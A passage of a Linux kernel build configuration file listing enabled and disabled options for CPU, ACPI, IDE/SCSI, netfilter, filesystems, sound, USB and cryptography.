CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set CONFIG_EDD=y CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_DEBUG=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_APM is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y # CONFIG_CPU_FREQ_PROC_INTF is not set CONFIG_CPU_FREQ_GOV_USERSPACE=y # CONFIG_CPU_FREQ_24_API is not set CONFIG_CPU_FREQ_TABLE=y # # CPUFreq processor drivers # # CONFIG_X86_ACPI_CPUFREQ is not set # CONFIG_X86_POWERNOW_K6 is not set CONFIG_X86_POWERNOW_K7=y # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # CONFIG_PCMCIA=y CONFIG_YENTA=y CONFIG_CARDBUS=y # CONFIG_I82092 is not set # CONFIG_TCIC is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y CONFIG_PNP_NAMES=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set CONFIG_PNPBIOS=y # # Block devices # # CONFIG_BLK_DEV_FD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=y # CONFIG_IDE_TASK_IOCTL is not set # CONFIG_IDE_TASKFILE_IO is not set # # IDE chipset support/bugfixes # CONFIG_BLK_DEV_CMD640=y # CONFIG_BLK_DEV_CMD640_ENHANCED is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set CONFIG_BLK_DEV_ALI15X3=y # CONFIG_WDC_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=64 CONFIG_AIC7XXX_RESET_DELAY_MS=2000 # CONFIG_AIC7XXX_PROBE_EISA_VL is not set # CONFIG_AIC7XXX_BUILD_FIRMWARE is not set # CONFIG_AIC7XXX_DEBUG_ENABLE is not set CONFIG_AIC7XXX_DEBUG_MASK=0 CONFIG_AIC7XXX_REG_PRETTY_PRINT=y # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set CONFIG_SCSI_QLOGIC_1280=y # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # PCMCIA SCSI adapter support # # CONFIG_PCMCIA_AHA152X is not set # CONFIG_PCMCIA_FDOMAIN is not set # CONFIG_PCMCIA_NINJA_SCSI is not set # CONFIG_PCMCIA_QLOGIC is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_UNCLEAN=y CONFIG_IP_NF_MATCH_OWNER=y CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_TARGET_MIRROR=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y # CONFIG_IP_NF_TARGET_REDIRECT is not set # CONFIG_IP_NF_NAT_LOCAL is not set # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y # CONFIG_IP_NF_TARGET_TCPMSS is not set CONFIG_IP_NF_ARPTABLES=y CONFIG_IP_NF_ARPFILTER=y CONFIG_IP_NF_ARP_MANGLE=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set CONFIG_NATSEMI=y # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=y CONFIG_PPP_SYNC_TTY=y CONFIG_PPP_DEFLATE=y CONFIG_PPP_BSDCOMP=y CONFIG_PPPOE=y # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # PCMCIA network device support # CONFIG_NET_PCMCIA=y # CONFIG_PCMCIA_3C589 is not set # CONFIG_PCMCIA_3C574 is not set # CONFIG_PCMCIA_FMVJ18X is not set CONFIG_PCMCIA_PCNET=y # CONFIG_PCMCIA_NMCLAN is not set # CONFIG_PCMCIA_SMC91C92 is not set # CONFIG_PCMCIA_XIRC2PS is not set # CONFIG_PCMCIA_AXNET is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_JOYDEV=y # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set CONFIG_SERIO_PCIPS2=y # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_SERIAL=y CONFIG_INPUT_JOYSTICK=y # CONFIG_JOYSTICK_IFORCE is not set CONFIG_JOYSTICK_WARRIOR=y # CONFIG_JOYSTICK_MAGELLAN is not set # CONFIG_JOYSTICK_SPACEORB is not set # CONFIG_JOYSTICK_SPACEBALL is not set # CONFIG_JOYSTICK_STINGER is not set # CONFIG_JOYSTICK_TWIDDLER is not set # CONFIG_JOYSTICK_DB9 is not set # CONFIG_JOYSTICK_GAMECON is not set # CONFIG_JOYSTICK_TURBOGRAFX is not set # CONFIG_INPUT_JOYDUMP is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set # CONFIG_SERIAL_8250_CS is not set CONFIG_SERIAL_8250_ACPI=y # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Hardware Sensors Mainboard support # # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # CONFIG_BUSMOUSE=y # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y CONFIG_AGP_ALI=y CONFIG_AGP_AMD=y # CONFIG_AGP_AMD_8151 is not set CONFIG_AGP_INTEL=y # CONFIG_AGP_NVIDIA is not set CONFIG_AGP_SIS=y CONFIG_AGP_SWORKS=y CONFIG_AGP_VIA=y CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set CONFIG_DRM_RADEON=y # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y # CONFIG_EXT2_FS_POSIX_ACL is not set # CONFIG_EXT2_FS_SECURITY is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_NTFS_FS=y # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFS_V4=y CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y CONFIG_NFSD_TCP=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y CONFIG_SUNRPC_GSS=y CONFIG_RPCSEC_GSS_KRB5=y CONFIG_SMB_FS=y # CONFIG_SMB_NLS_DEFAULT is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # CONFIG_SND_ALI5451=y # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=y # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y CONFIG_USB_OHCI_HCD=y # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_STORAGE is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y CONFIG_HID_FF=y # CONFIG_HID_PID is not set CONFIG_LOGITECH_FF=y # CONFIG_THRUSTMASTER_FF is not set # CONFIG_USB_HIDDEV is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_AX8817X is not set # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_DEBUG_SPINLOCK_SLEEP=y # CONFIG_FRAME_POINTER is not set # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=y CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y CONFIG_CRYPTO_SHA256=y CONFIG_CRYPTO_SHA512=y CONFIG_CRYPTO_DES=y CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y 